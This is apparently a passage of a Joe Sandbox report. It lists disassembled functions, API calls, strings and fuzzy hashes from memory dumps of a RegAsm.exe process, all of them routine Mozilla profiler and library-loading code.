Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C3055F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C2DE1A5), ref: 6C305606
LoadLibraryW.KERNEL32(gdi32,?,6C2DE1A5), ref: 6C30560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C305633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C30563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C30566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C30567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C305696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C3056B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C3056CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C3056E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C3056FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C305716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C30572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C305748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C305761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C30577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C305793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C3057A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C3057BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C3057D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C3057EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C3057FF

Strings

EnableNonClientDpiScaling, xrefs: 6C305666
SetWindowLongPtrW, xrefs: 6C3057B7
LoadCursorW, xrefs: 6C305774
gdi32, xrefs: 6C30560A
MonitorFromWindow, xrefs: 6C30578D
ReleaseDC, xrefs: 6C305742
AreDpiAwarenessContextsEqual, xrefs: 6C305637
LoadIconW, xrefs: 6C30575B
GetThreadDpiAwarenessContext, xrefs: 6C30562D
CreateSolidBrush, xrefs: 6C3057E4
GetMonitorInfoW, xrefs: 6C3057A2
user32, xrefs: 6C305601
RegisterClassW, xrefs: 6C3056AC
ShowWindow, xrefs: 6C3056DE
DeleteObject, xrefs: 6C3057F9
CreateWindowExW, xrefs: 6C3056C5
StretchDIBits, xrefs: 6C3057CC
SetWindowPos, xrefs: 6C3056F7
GetWindowDC, xrefs: 6C305710
FillRect, xrefs: 6C305729
GetDpiForWindow, xrefs: 6C305690
GetSystemMetricsForDpi, xrefs: 6C305677

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: dbd297b1020b88782148d29fea4b5bd224ab159e58d460299bbf225afc84a74c
Instruction ID: 70a53292f63a4cf6e551c34b15b3d4ac607c9510483891b25fe87a588ba4c679
Opcode Fuzzy Hash: dbd297b1020b88782148d29fea4b5bd224ab159e58d460299bbf225afc84a74c
Instruction Fuzzy Hash: CA5164717017169BDF009F399D4492A3AFCFF0A249724452DED12E6A45EB7DC800CF68

Function 6C2ECC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C2B582D), ref: 6C2ECC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C2B582D), ref: 6C2ECC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C31FE98,?,?,?,?,?,6C2B582D), ref: 6C2ECC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C2B582D), ref: 6C2ECC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C2B582D), ref: 6C2ECC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C2B582D), ref: 6C2ECC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2B582D), ref: 6C2ECCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C2ECCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C2ECCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C2ECCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C2ECCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C2ECD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C2ECD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C2ECD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C2ECDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C2ECDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C2ECDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C2ECDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C2ECE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C2ECE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C2ECE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C2ECE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C2ECE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C2ECE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C2ECE8A

Strings

leaf, xrefs: 6C2ECC66
power, xrefs: 6C2ECE84
fileioall, xrefs: 6C2ECCA8
cpuallthreads, xrefs: 6C2ECE16
fileio, xrefs: 6C2ECC92
markersallthreads, xrefs: 6C2ECE42
notimerresolutionchange, xrefs: 6C2ECE00
mainthreadio, xrefs: 6C2ECC7C
default, xrefs: 6C2ECC21
screenshots, xrefs: 6C2ECCD4
ipcmessages, xrefs: 6C2ECDBE
seqstyle, xrefs: 6C2ECCE6
nativeallocations, xrefs: 6C2ECDA8
stackwalk, xrefs: 6C2ECCF8
preferencereads, xrefs: 6C2ECD92
samplingallthreads, xrefs: 6C2ECE2C
jsallocations, xrefs: 6C2ECD0E
java, xrefs: 6C2ECC37
nostacksampling, xrefs: 6C2ECD7C
audiocallbacktracing, xrefs: 6C2ECDD4
Unrecognized feature "%s"., xrefs: 6C2ECEA0
noiostacks, xrefs: 6C2ECCBE
unregisteredthreads, xrefs: 6C2ECE58
processcpu, xrefs: 6C2ECE6E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 8128bc409cb55a38eb0459f9bda2bd83dd3d9dab0adff40d5558d10bb8b283e2
Instruction ID: c5b42aded1c2eba8ef96c14fcaa46f5e69df298fc049671493350f2df37e8405
Opcode Fuzzy Hash: 8128bc409cb55a38eb0459f9bda2bd83dd3d9dab0adff40d5558d10bb8b283e2
Instruction Fuzzy Hash: 6751B8D490926E16FE0C30956D20FEA2C04EB1B64BF945436FD4DB1E84FB0E961989B7

Function 6C2B47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C2B4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2B4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2B482D
__Init_thread_footer.LIBCMT ref: 6C2B484A

Part of subcall function 6C2DAB3F: EnterCriticalSection.KERNEL32(6C32E370,?,?,6C2A3527,6C32F6CC,?,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB49
Part of subcall function 6C2DAB3F: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A3527,6C32F6CC,?,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DAB7C

GetCurrentThreadId.KERNEL32 ref: 6C2B485F
GetCurrentThreadId.KERNEL32 ref: 6C2B487E
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2B488B
free.MOZGLUE(?), ref: 6C2B493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B4956
free.MOZGLUE(00000000), ref: 6C2B4960
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2B499A

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

free.MOZGLUE(?), ref: 6C2B49C6
free.MOZGLUE(?), ref: 6C2B49E9

Part of subcall function 6C2C5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C2C5EDB
Part of subcall function 6C2C5E90: memset.VCRUNTIME140(ew0l,000000E5,?), ref: 6C2C5F27
Part of subcall function 6C2C5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C2C5FB2

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C2B47FC
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C2B4812
MOZ_PROFILER_SHUTDOWN, xrefs: 6C2B4A42
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C2B4828
[I %d/%d] profiler_shutdown, xrefs: 6C2B4A06

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 05d6b008f1341611f7c917190b4321847b2dc64bfceb6002abea1463d3988127
Instruction ID: 6c78475740d2fc123e6a6259679ab5e704cbb845b206d066f56c4dfc78298a7d
Opcode Fuzzy Hash: 05d6b008f1341611f7c917190b4321847b2dc64bfceb6002abea1463d3988127
Instruction Fuzzy Hash: AC811271A001198BEF00DF28D8D4B5A7779AF4636DF14022DED16BBB42E739E844CB96

Function 6C2B4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2B4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C2B44B2,6C32E21C,6C32F7F8), ref: 6C2B473E
Part of subcall function 6C2B4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C2B474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C2B44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C2B44D2
InitOnceExecuteOnce.KERNEL32(6C32F80C,6C2AF240,?,?), ref: 6C2B451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C2B455C
LoadLibraryW.KERNEL32(?), ref: 6C2B4592
InitializeCriticalSection.KERNEL32(6C32F770), ref: 6C2B45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C2B45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C2B45BB
InitOnceExecuteOnce.KERNEL32(6C32F818,6C2AF240,?,?), ref: 6C2B4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C2B4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C2B4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C2B466D
VerSetConditionMask.NTDLL ref: 6C2B469F
VerSetConditionMask.NTDLL ref: 6C2B46AB
VerSetConditionMask.NTDLL ref: 6C2B46B2
VerSetConditionMask.NTDLL ref: 6C2B46B9
VerSetConditionMask.NTDLL ref: 6C2B46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C2B46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C2B46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C2B46FD

Strings

G2l, xrefs: 6C2B44FC
NativeNtBlockSet_Write, xrefs: 6C2B46F7
user32.dll, xrefs: 6C2B4557, 6C2B463F
WRusr.dll, xrefs: 6C2B44B5
kernel32.dll, xrefs: 6C2B44CD
l, xrefs: 6C2B4578

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: G2l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3739276613
Opcode ID: 6e891505eb83442569de7cbc9c86043afa3c5e546b7cff3f810aee924c6b885f
Instruction ID: ff7444c65722d32d63049c84d0d8e45a66bfa5d24c623cbc023d112c47865627
Opcode Fuzzy Hash: 6e891505eb83442569de7cbc9c86043afa3c5e546b7cff3f810aee924c6b885f
Instruction Fuzzy Hash: 4E6103B0600358AFEF109F64D889B95BBBCEB4A78DF04855CED45AB641D3BC8985CF90

Function 6C2B19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C32F760), ref: 6C2B19BD
GetCurrentProcess.KERNEL32 ref: 6C2B19E5
GetLastError.KERNEL32 ref: 6C2B1A27
moz_xmalloc.MOZGLUE(?), ref: 6C2B1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C2B1A4F
GetLastError.KERNEL32 ref: 6C2B1A92
moz_xmalloc.MOZGLUE(?), ref: 6C2B1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C2B1ABA
LocalFree.KERNEL32(?), ref: 6C2B1C69
free.MOZGLUE(?), ref: 6C2B1C8F
free.MOZGLUE(?), ref: 6C2B1C9D
CloseHandle.KERNEL32(?), ref: 6C2B1CAE
ReleaseSRWLockExclusive.KERNEL32(6C32F760), ref: 6C2B1D52
GetLastError.KERNEL32 ref: 6C2B1DA5
GetLastError.KERNEL32 ref: 6C2B1DFB
GetLastError.KERNEL32 ref: 6C2B1E49
GetLastError.KERNEL32 ref: 6C2B1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2B1E9B

Part of subcall function 6C2B2070: LoadLibraryW.KERNEL32(combase.dll,6C2B1C5F), ref: 6C2B20AE
Part of subcall function 6C2B2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C2B20CD
Part of subcall function 6C2B2070: __Init_thread_footer.LIBCMT ref: 6C2B20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C2B1F15
VerSetConditionMask.NTDLL ref: 6C2B1F46
VerSetConditionMask.NTDLL ref: 6C2B1F52
VerSetConditionMask.NTDLL ref: 6C2B1F59
VerSetConditionMask.NTDLL ref: 6C2B1F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C2B1F6D

Strings

D, xrefs: 6C2B1B57

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: a6a2253482eafe068239adb27cee9151340f920125442f3ed39b04179ac3e223
Instruction ID: 770f9bc5a10ea2eed759c2c037e598a63d3fbfc3d66c60d46da76dd6e31e3c3b
Opcode Fuzzy Hash: a6a2253482eafe068239adb27cee9151340f920125442f3ed39b04179ac3e223
Instruction Fuzzy Hash: BEF18F71A0032AAFEB209F65CC49B9AB7B8FF09749F104198E905B7640D774ED80CFA1

Function 6C2EE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C2EB9F1,?), ref: 6C2E7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C2EDCF5), ref: 6C2EE92D
GetCurrentThreadId.KERNEL32 ref: 6C2EEA4F
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEA5C
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEA80
GetCurrentThreadId.KERNEL32 ref: 6C2EEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C2EDCF5), ref: 6C2EEA92
GetCurrentThreadId.KERNEL32 ref: 6C2EEB11
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C2EEB3C
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEB5B

Part of subcall function 6C2E5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2EEB71), ref: 6C2E57AB

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C2EEBAC

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

GetCurrentThreadId.KERNEL32 ref: 6C2EEBC1
AcquireSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000), ref: 6C2EEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C2EEBE5
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8,00000000), ref: 6C2EEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2EEC46
CloseHandle.KERNEL32(?), ref: 6C2EEC55
free.MOZGLUE(00000000), ref: 6C2EEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C2EEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C2EEA9B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 959a194e315ec8848801e23cab0ff87ce1a035c50aa3f8ea288b7e1cc80c2f3c
Instruction ID: d84d6882e881109d1155373d18da820550224c513d81aeca8d583c9975c3baae
Opcode Fuzzy Hash: 959a194e315ec8848801e23cab0ff87ce1a035c50aa3f8ea288b7e1cc80c2f3c
Instruction Fuzzy Hash: 22A159717006188FCF009F28D444BA6B7B9FF8E318F55412DED1A97B41DB78A405CBA1

Function 6C2EF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C2EF8F9

Part of subcall function 6C2B6390: GetCurrentThreadId.KERNEL32 ref: 6C2B63D0
Part of subcall function 6C2B6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C2B63DF
Part of subcall function 6C2B6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C2B640E

ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF93A
GetCurrentThreadId.KERNEL32 ref: 6C2EF98A
GetCurrentThreadId.KERNEL32 ref: 6C2EF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EF716

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

Part of subcall function 6C2AB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C2AB5E0

GetCurrentThreadId.KERNEL32 ref: 6C2EF739
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EF746
GetCurrentThreadId.KERNEL32 ref: 6C2EF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C32385B,00000002,?,?,?,?,?), ref: 6C2EF829
free.MOZGLUE(?,?,00000000,?), ref: 6C2EF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C2EF866
free.MOZGLUE(?), ref: 6C2EFA0C

Part of subcall function 6C2B5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2B55E1), ref: 6C2B5E8C
Part of subcall function 6C2B5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B5E9D
Part of subcall function 6C2B5E60: GetCurrentThreadId.KERNEL32 ref: 6C2B5EAB
